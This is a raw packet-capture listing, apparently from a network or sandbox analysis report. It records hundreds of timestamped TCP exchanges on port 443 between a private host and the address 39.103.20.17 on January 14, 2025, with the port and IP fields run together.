                                                                        Jan 14, 2025 05:11:06.643174887 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.645924091 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.646172047 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.649560928 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.649816990 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.655786037 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.656115055 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.658911943 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.659152031 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.659216881 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.665493965 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.665831089 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.668667078 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.668921947 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.672060013 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.672296047 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.678325891 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.678565025 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.678612947 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.681566954 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.681757927 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.687885046 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.688132048 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.688179970 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.688421965 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.954417944 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.954654932 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.957343102 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.957585096 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.957623959 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.957869053 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.960426092 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.960644007 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.963604927 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.963850975 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.969942093 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.970168114 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.976309061 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.976560116 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.976560116 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.979756117 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.979973078 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.982978106 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.983200073 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.983200073 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.986129999 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.986332893 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.992471933 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.992758036 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.998722076 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.999012947 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.001931906 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.002159119 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.002171993 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.002464056 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.005486012 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.005690098 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.012108088 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.012335062 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.012352943 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.012614012 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.015101910 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.015355110 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.021588087 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.021856070 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.050271034 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.050473928 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.094652891 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.263380051 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.263715029 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.267894030 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.268136978 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.271131039 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.271395922 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.277609110 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.277853966 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.277853966 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.280777931 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.281013966 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.284010887 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.284230947 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.284281015 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.290340900 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.290553093 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.296744108 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.296961069 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.299978971 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.300216913 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.303314924 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.303751945 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.309721947 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.309961081 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.312870026 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.313136101 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.319488049 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.319694042 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.322694063 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.323043108 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.323093891 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.323532104 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.325784922 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.326021910 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.332123995 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.332333088 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.332374096 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.335398912 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.335891008 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.341830015 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.342042923 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.342086077 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.345200062 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.345479965 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.348495960 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.348709106 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.348753929 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.354904890 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.355112076 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.358164072 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.358422995 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.364438057 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.364648104 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.367647886 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.367918968 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.368387938 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.374409914 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.374840975 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.377420902 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.377659082 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.380686998 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.380894899 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.383025885 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.387140989 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.387676954 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.390336990 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.390619993 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.396677971 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.396883965 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.396929979 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.397145987 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.399961948 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.400311947 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.403089046 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.403595924 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.409548044 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.409765959 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.413414001 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.413647890 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.419467926 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.419768095 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.422570944 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.422784090 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.425893068 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.426187992 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.432641983 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.432876110 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.434609890 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.435491085 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.435703993 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.442022085 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.442456007 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.442507982 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.442796946 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.445115089 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.445348024 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.448643923 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.448935032 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.454716921 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.455248117 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.461174965 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.461432934 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.591013908 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.591753006 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.592550993 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.592855930 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.595763922 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.595963001 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.597670078 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.602382898 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.603058100 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.606053114 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.606317997 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.611967087 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.612170935 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.612241983 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.615201950 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.615411997 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.618557930 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.618818998 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.618818998 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.624967098 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.625190973 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.629614115 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.629838943 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.634622097 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.634872913 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.637823105 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.638179064 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.638226032 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.638528109 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.641184092 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.641370058 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.647802114 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.648057938 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.648102045 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.648428917 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.650841951 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.651350975 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.657355070 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.657605886 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.657605886 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.660444975 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.660654068 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.663827896 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.664221048 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.664252996 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.664628029 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.670259953 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.670511961 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.676613092 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.676821947 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.676862955 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.679723024 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.679929972 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.683396101 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.683655977 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.689548016 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.689749956 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.692826033 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.693037987 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.693037987 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.699135065 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.699521065 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.702331066 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.702583075 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.702610016 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.702913046 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.705485106 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.705670118 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.711519957 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.711775064 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.711812973 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.712147951 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.714720964 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.714935064 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.720262051 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.720403910 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.720446110 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.723161936 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.723355055 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.726269007 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.726481915 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.726481915 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.731314898 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.731705904 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.737168074 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.737377882 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.737377882 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.739487886 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.739512920 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.739804983 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.742177963 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.742556095 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.742556095 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.747626066 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.747834921 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.749809980 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.750209093 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.750248909 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.750395060 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.754877090 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.755095959 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.757618904 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.757831097 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.757874966 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.758141994 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.760539055 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.761192083 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.765548944 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.765755892 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.765755892 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.767136097 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.767342091 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.771850109 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.772056103 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.772099018 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.772422075 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.774522066 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.774765015 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.776730061 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.776983023 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.777017117 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.777652979 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.781219959 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.781457901 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.783620119 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.783828974 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.787954092 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.788156986 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.790498018 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.790975094 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.791018009 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.791358948 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.792831898 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.793303967 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.797138929 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.797348022 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.797390938 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.797658920 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.799755096 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.799940109 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.804622889 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.805159092 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.805197001 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.805535078 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.806524992 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.806757927 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.812098026 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.812305927 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.814347029 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.814552069 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.815337896 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.815548897 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.815548897 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.820144892 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.820372105 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.822279930 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.822904110 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.822941065 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.823262930 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.826637030 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.826821089 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.829153061 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.829361916 CET49759443192.168.11.2039.103.20.17
